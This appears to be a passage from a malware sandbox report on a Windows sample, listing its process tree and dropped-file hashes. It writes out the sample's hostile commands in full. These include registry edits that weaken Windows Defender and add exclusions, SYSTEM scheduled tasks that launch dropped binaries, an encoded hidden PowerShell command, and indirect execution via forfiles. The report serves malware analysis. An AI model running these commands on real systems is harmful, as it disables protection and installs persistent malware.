                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:4816
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1328
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4588
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:64;"
                                                  2⤵
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4376
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:4976
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5012
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:4124
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:3796
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1616
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:3304
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1712
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4316
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:4676
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:756
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                                PID:3672
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:4868
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:3776
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:672
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                        PID:1428
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4320
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3484
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                          PID:912
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                            PID:3680
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gRphGgTiB" /SC once /ST 05:50:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          2⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:4292
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gRphGgTiB"
                                                                          2⤵
                                                                            PID:3160
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gRphGgTiB"
                                                                            2⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1032
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "mmcKQTFpdsyEWxyLI" /SC once /ST 13:18:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe\" pi /zbmfdidRM 525403 /S" /V1 /F
                                                                            2⤵
                                                                            • Drops file in Windows directory
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2824
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /run /I /tn "mmcKQTFpdsyEWxyLI"
                                                                            2⤵
                                                                              PID:2892
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 752
                                                                              2⤵
                                                                              • Program crash
                                                                              PID:3152
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                            1⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:512
                                                                            • C:\Windows\system32\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              2⤵
                                                                                PID:3852
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                              1⤵
                                                                                PID:3480
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                1⤵
                                                                                  PID:4392
                                                                                • \??\c:\windows\system32\gpscript.exe
                                                                                  gpscript.exe /RefreshSystemParam
                                                                                  1⤵
                                                                                    PID:3156
                                                                                  • C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe
                                                                                    C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe pi /zbmfdidRM 525403 /S
                                                                                    1⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops Chrome extension
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3280
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      2⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5088
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2948
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:1496
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1724
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:2780
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:828
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5016
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2180
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                              4⤵
                                                                                                PID:3640
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                    PID:4668
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                3⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:4884
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                  4⤵
                                                                                                    PID:4976
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                      5⤵
                                                                                                        PID:4124
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                    3⤵
                                                                                                    • Indirect Command Execution
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3976
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1552
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4276
                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          6⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3484
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bJaUjLwxLUDwMvBjjy"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4928
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4688
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                    3⤵
                                                                                                    • Indirect Command Execution
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2696
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5080
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2296
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                          6⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3156
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AfQFmMtUU\fMJyhT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PWWBhyALfcSbedp" /V1 /F
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1848
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "PWWBhyALfcSbedp2" /F /xml "C:\Program Files (x86)\AfQFmMtUU\sZmuuuz.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4608
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /END /TN "PWWBhyALfcSbedp"
                                                                                                  2⤵
                                                                                                    PID:1844
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "PWWBhyALfcSbedp"
                                                                                                    2⤵
                                                                                                      PID:2576
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "RprkBAAFxCYqMr" /F /xml "C:\Program Files (x86)\enDWjyqEZhNU2\PwbYhRs.xml" /RU "SYSTEM"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4216
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "isOwubXyPbRIa2" /F /xml "C:\ProgramData\qDoHUGiKOnuwyvVB\ptXituU.xml" /RU "SYSTEM"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2056
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "ZPzYZUwOurxmvkKKy2" /F /xml "C:\Program Files (x86)\XTIErcVviYlSEsscsXR\pnzWIiw.xml" /RU "SYSTEM"
                                                                                                      2⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:1376
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "gtjPvKPVMNaEWIYZSDJ2" /F /xml "C:\Program Files (x86)\LSPuJNxSevMsC\sAaRZSu.xml" /RU "SYSTEM"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:5068
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "ALUoYMkKWcUKdiGlz" /SC once /ST 13:09:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll\",#1 /kdidNu 525403" /V1 /F
                                                                                                      2⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4184
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /run /I /tn "ALUoYMkKWcUKdiGlz"
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:164
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "mmcKQTFpdsyEWxyLI"
                                                                                                      2⤵
                                                                                                        PID:1268
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 2168
                                                                                                        2⤵
                                                                                                        • Program crash
                                                                                                        PID:3100
                                                                                                    • \??\c:\windows\system32\rundll32.EXE
                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll",#1 /kdidNu 525403
                                                                                                      1⤵
                                                                                                        PID:2296
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll",#1 /kdidNu 525403
                                                                                                          2⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Enumerates system info in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4220
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "ALUoYMkKWcUKdiGlz"
                                                                                                            3⤵
                                                                                                              PID:3668

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                          Filesize

                                                                                                          129B

                                                                                                          MD5

                                                                                                          a526b9e7c716b3489d8cc062fbce4005

                                                                                                          SHA1

                                                                                                          2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                          SHA256

                                                                                                          e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                          SHA512

                                                                                                          d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                        • C:\Program Files (x86)\AfQFmMtUU\sZmuuuz.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          26fcd8dbfd6f105036d0ff5102007ae4

                                                                                                          SHA1

                                                                                                          501f4e0d342d46e142cbb474129fadd80d0e3d97

                                                                                                          SHA256

                                                                                                          5761579667c3afba4b9fa61077523953a11a966410e1f00945f43df0103b5400

                                                                                                          SHA512

                                                                                                          05f1800f098ed879c1dee43c1b4d82563107b2458d95d5cf38d945b7914bd5b8a2dc7c4b1d2f9cf7c228035aa576364c5e17d1d87766de28b71b06ba066fc114

                                                                                                        • C:\Program Files (x86)\LSPuJNxSevMsC\sAaRZSu.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

